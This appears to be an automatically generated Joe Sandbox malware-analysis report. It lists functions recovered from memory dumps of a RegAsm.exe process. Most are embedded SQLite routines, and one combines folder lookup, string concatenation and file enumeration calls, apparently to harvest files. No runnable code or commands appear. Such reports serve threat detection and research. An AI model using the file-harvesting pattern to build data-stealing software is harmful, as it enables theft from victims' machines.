Instruction ID: 1427177a95c760848ccbda204b7d26ea2269305e609c9ae0dd80fe0dd36cfa04
Opcode Fuzzy Hash: 3bb7098c004e6e0b868fb9e12c9edf3dfe0681dcdbad557e99bda5bbdbeb0f1b
Instruction Fuzzy Hash: 5F01C431A01611ABDB20AB6598157EE7760FF08764F11411BE45063390C73C9EC2CFDE

Uniqueness

Uniqueness Score: -1.00%

Function 19B6ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON

Download Yara Rule

Strings

misuse, xrefs: 19B6AE18
%s at line %d of [%.10s], xrefs: 19B6AE1D
unable to delete/modify user-function due to active statements, xrefs: 19B6AD61
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B6AE0E

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
API String ID: 0-3864549341
Opcode ID: 51200fef3b1fdef457902d8e10ee35f51b7277077328b0d2c47878cf99c6574e
Instruction ID: 4a1ed8795f476a8867faddf388c4c735d43baf7a83c502578f40f4c940fbb3a3
Opcode Fuzzy Hash: 51200fef3b1fdef457902d8e10ee35f51b7277077328b0d2c47878cf99c6574e
Instruction Fuzzy Hash: 5F51E472604340AFDB148E25DC80B6FB7F8EF8A755F18492DF586962A1D331F8108B62

Uniqueness

Uniqueness Score: -1.00%

Function 19A7A860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON

Download Yara Rule

Strings

bytecode, xrefs: 19A7A96E
stmt-pointer, xrefs: 19A7A928
tables_used, xrefs: 19A7A973, 19A7A97B
argument to %s() is not a valid SQL statement, xrefs: 19A7A97C

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
API String ID: 0-361449301
Opcode ID: d2c960ac491dcb598f49c54816284b83fbcbff5d371f9b8ca37d81471d9b18f1
Instruction ID: 5c79c4d04ef9dc4849fb40f6dfe6c5977900b536c89d2495a1b4aa2dc04d80bd
Opcode Fuzzy Hash: d2c960ac491dcb598f49c54816284b83fbcbff5d371f9b8ca37d81471d9b18f1
Instruction Fuzzy Hash: 22611472600741AFDB188F60D8A676377E8EF00B04F09496DE99AC7281E776E55CCB92

Uniqueness

Uniqueness Score: -1.00%

Function 19B8BF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON

Download Yara Rule

Strings

fts5 expression tree is too large (maximum depth %d), xrefs: 19B8C070
phrase, xrefs: 19B8C035, 19B8C042
fts5: %s queries are not supported (detail!=full), xrefs: 19B8C043
NEAR, xrefs: 19B8C03A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
API String ID: 0-593389478
Opcode ID: 64d679473c7874f0823944935e330cd398a7305cdc034dc72eb0c4b2754bf03b
Instruction ID: a77f5d0e9435acb35f326e8e29ba4fc102a5d742410c1438eac7c718766e37ce
Opcode Fuzzy Hash: 64d679473c7874f0823944935e330cd398a7305cdc034dc72eb0c4b2754bf03b
Instruction Fuzzy Hash: 984124B1E002269FD714CE24D980B6AF3A4FF8C794F19956EE84587291E772FC49CB81

Uniqueness

Uniqueness Score: -1.00%

Function 19AAF490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

misuse, xrefs: 19AAF4BA
%s at line %d of [%.10s], xrefs: 19AAF4BF
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AAF4B0
unable to delete/modify collation sequence due to active statements, xrefs: 19AAF533

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 0-3348720253
Opcode ID: 696f4f8c240d013e4aab7e66eb229414f8c7ded262d12aee3c4ec10b4074b6d8
Instruction ID: cc8fb0634f049e1aaf9be210f3e2b77a2b056bae4f55f8bcd25e7b179425dc66
Opcode Fuzzy Hash: 696f4f8c240d013e4aab7e66eb229414f8c7ded262d12aee3c4ec10b4074b6d8
Instruction Fuzzy Hash: 8B41F5726043419BD704DE28EC80BAAB7ECEF81725F18456EF5559B2C2D322E519CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00417620 Relevance: 8.9, APIs: 7, Instructions: 123stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000104,012C3260), ref: 00417697

Part of subcall function 004116F0: SHGetFolderPathA.SHELL32(00000000,?{B,00000000,00000000,?,?,00000000), ref: 00411728

lstrcat.KERNEL32(?,00000000), ref: 004176BE
lstrcat.KERNEL32(?,?), ref: 004176DE
lstrcat.KERNEL32(?,?), ref: 004176F2
lstrcat.KERNEL32(?,012B4070), ref: 00417705
lstrcat.KERNEL32(?,?), ref: 00417719
lstrcat.KERNEL32(?,012C2940), ref: 0041772D

Part of subcall function 0040FE80: lstrcpy.KERNEL32(00000000,00418891), ref: 0040FEA9

Part of subcall function 00411690: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421FB8,000000FF,?,0040E94A,?,00000000,00000000,00000000), ref: 004116B7

Part of subcall function 004173C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004173EE
Part of subcall function 004173C0: HeapAlloc.KERNEL32(00000000), ref: 004173F5
Part of subcall function 004173C0: wsprintfA.USER32 ref: 0041740E
Part of subcall function 004173C0: FindFirstFileA.KERNEL32(?,?), ref: 00417425

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction ID: 9e94d96a6c2fa7cf23f7c992aa699a2e18ad3ccda8d2e94c686f4496ebe02aa9
Opcode Fuzzy Hash: 8876f39cce22fdb87c7a47d4661a8add8284090edec9c7919bf3d1b7426972d0
Instruction Fuzzy Hash: 08419AB5900219ABCB10EBA1CC46FDD7778AB0D704F40459EF715A3191DB78A788CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040F7A0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F7BA

Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC75
Part of subcall function 0041FC60: __CxxThrowException@8.LIBCMT ref: 0041FC8A
Part of subcall function 0041FC60: std::exception::exception.LIBCMT ref: 0041FC9B

std::_Xinvalid_argument.LIBCPMT ref: 0040F7F7

Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC28
Part of subcall function 0041FC13: __CxxThrowException@8.LIBCMT ref: 0041FC3D
Part of subcall function 0041FC13: std::exception::exception.LIBCMT ref: 0041FC4E

memcpy.MSVCRT ref: 0040F858

Strings

invalid string position, xrefs: 0040F7B5
string too long, xrefs: 0040F7F2

Memory Dump Source

Source File: 00000004.00000002.2201515338.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2201515338.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000518000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000521000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.000000000055F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.00000000005F9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2201515338.0000000000641000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
String ID: invalid string position$string too long
API String ID: 85833692-4289949731
Opcode ID: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction ID: fd4a6935f257f4bdd60dc841e67110243277f01f0b010555ef6c2c1b1382e91b
Opcode Fuzzy Hash: 259f7feb66d68c8b8732089a7e33fb221ea85756fea1742300547b64a0c07829
Instruction Fuzzy Hash: 9F31F4333002149BD730AE5CE880BAAF399EBA1764B24093FF141DB6C1D775DC4983A9

Uniqueness

Uniqueness Score: -1.00%

Function 19B3EBD0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON

Download Yara Rule

Strings

CREATE , xrefs: 19B3EBFF
%s at line %d of [%.10s], xrefs: 19B3EC51
database corruption, xrefs: 19B3EC4C
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B3EC42

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$CREATE $database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-1360532505
Opcode ID: 43fef9cb2e52f4a222d954e009f20114eded3b641563498068aefc93dc4feb63
Instruction ID: f75e1749e5d9c8b49de956060a498d0eaa9b6c6e8734f9d11062ba09ce0b5ed1
Opcode Fuzzy Hash: 43fef9cb2e52f4a222d954e009f20114eded3b641563498068aefc93dc4feb63
Instruction Fuzzy Hash: 43314BA25083C55BEB218A2DDC40BE67F91EB5121BF9C40BBF8C58A1C2E321A650C731

Uniqueness

Uniqueness Score: -1.00%

Function 19B193A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 93COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19B19455, 19B19499
database corruption, xrefs: 19B19450, 19B19494
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B19446, 19B1948A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 69827a44650e6dfc5b3433cfb980a90f40b2d20476ab6f01bc5493e945ce76c6
Instruction ID: b534e4ee0218d637a3ecd9d01c9834dcc44a569bc2b032391725b50c6e1b413f
Opcode Fuzzy Hash: 69827a44650e6dfc5b3433cfb980a90f40b2d20476ab6f01bc5493e945ce76c6
Instruction Fuzzy Hash: 0A316E396407904BD324DF28E890AF3BBF2DF85705B5884ACD9D24B786D322E841C750

Uniqueness

Uniqueness Score: -1.00%

Function 19A71C60 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 88COMMON

Download Yara Rule

Strings

misuse, xrefs: 19A71D46
%s at line %d of [%.10s], xrefs: 19A71D4B
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19A71D3C
unknown database: %s, xrefs: 19A71CBD

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unknown database: %s
API String ID: 0-142545749
Opcode ID: c7b9efbfd7ff3025414191460e3ee67679874764b6c40373194ff0f76902d382
Instruction ID: f66e56544417623259b9014053aa3cd7dde2d50b9f71b1d19b02324f5ab50778
Opcode Fuzzy Hash: c7b9efbfd7ff3025414191460e3ee67679874764b6c40373194ff0f76902d382
Instruction Fuzzy Hash: 8C2102B5500780ABE7109B25DC85F977BEEEFC2B58F0C052CF898562C2E732B5198662

Uniqueness

Uniqueness Score: -1.00%

Function 19AA3FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 85COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19AA408C, 19AA40B7
database corruption, xrefs: 19AA4087, 19AA40B2
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19AA407D, 19AA40A8

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 9ca86e4212ea9a46b27423d27c10a90ffb7bf93d9d136556e1185ac8ef4ede6e
Instruction ID: 110b7500f2327d2017db6d676765003735a2610a61e5729a4ae7627c46410aab
Opcode Fuzzy Hash: 9ca86e4212ea9a46b27423d27c10a90ffb7bf93d9d136556e1185ac8ef4ede6e
Instruction Fuzzy Hash: 2B2103B76402115BC700DE0CEC40AFB7BD0EB94A11F8A4026FD84D7341E329EA49C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 19B19290 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 70COMMON

Download Yara Rule

Strings

%s at line %d of [%.10s], xrefs: 19B192AB, 19B19339
database corruption, xrefs: 19B192A6, 19B19334
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 19B1929C, 19B1932A

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$database corruption$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f
API String ID: 0-2528248365
Opcode ID: 7c0bd724d2baf5c8cbf35cf7de38062a13ca1076813ee9a8096a71b05331d42f
Instruction ID: fceb81ab6e67a1dd29c09de391f5096a2e75261167965fe5bc175aa0fc64de94
Opcode Fuzzy Hash: 7c0bd724d2baf5c8cbf35cf7de38062a13ca1076813ee9a8096a71b05331d42f
Instruction Fuzzy Hash: 2C214935144B905BC321DF28BC80AF3BFF2AF55700B8D85ACE5D28B796E222E8818750

Uniqueness

Uniqueness Score: -1.00%

Function 19A833C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54COMMON

Download Yara Rule

Strings

CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN), xrefs: 19A833D6

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAA000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211348979.0000000019CAF000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_19a60000_RegAsm.jbxd

Similarity

API ID:
String ID: CREATE TABLE x(pgno INTEGER PRIMARY KEY, data BLOB, schema HIDDEN)
API String ID: 0-1935849370
Opcode ID: 07a2aa63eea0852623990f80629a75ed6846d8e09f1086cb6043d0432200612b
Instruction ID: bc7ca3f7ff7f30f1414c435a49ae1529e1864e026d1c42f1b6a3331e0f4cbbea
Opcode Fuzzy Hash: 07a2aa63eea0852623990f80629a75ed6846d8e09f1086cb6043d0432200612b
Instruction Fuzzy Hash: 5F0192397142169BD701DF19E800B8AB3D9EFC5B16F49C17AF6448B290EB70A48B87A1

Uniqueness

Uniqueness Score: -1.00%

Function 19C15BC1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,DB337CAA,?,?,00000000,19C6D1CB,000000FF,?,19C15B30,?,?,19C15ADF,?), ref: 19C15BF6
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 19C15C08
FreeLibrary.KERNEL32(00000000,?,?,00000000,19C6D1CB,000000FF,?,19C15B30,?,?,19C15ADF,?), ref: 19C15C2A

Strings

mscoree.dll, xrefs: 19C15BEF
CorExitProcess, xrefs: 19C15C00

Memory Dump Source

Source File: 00000004.00000002.2210612984.0000000019BC6000.00000020.00001000.00020000.00000000.sdmp, Offset: 19A60000, based on PE: true

Associated: 00000004.00000002.2210596512.0000000019A60000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A61000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019A68000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2210612984.0000000019C6D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C6F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211244332.0000000019C78000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2211329305.0000000019CA2000.00000004.00001000.00020000.00000000.sdmpDownload File
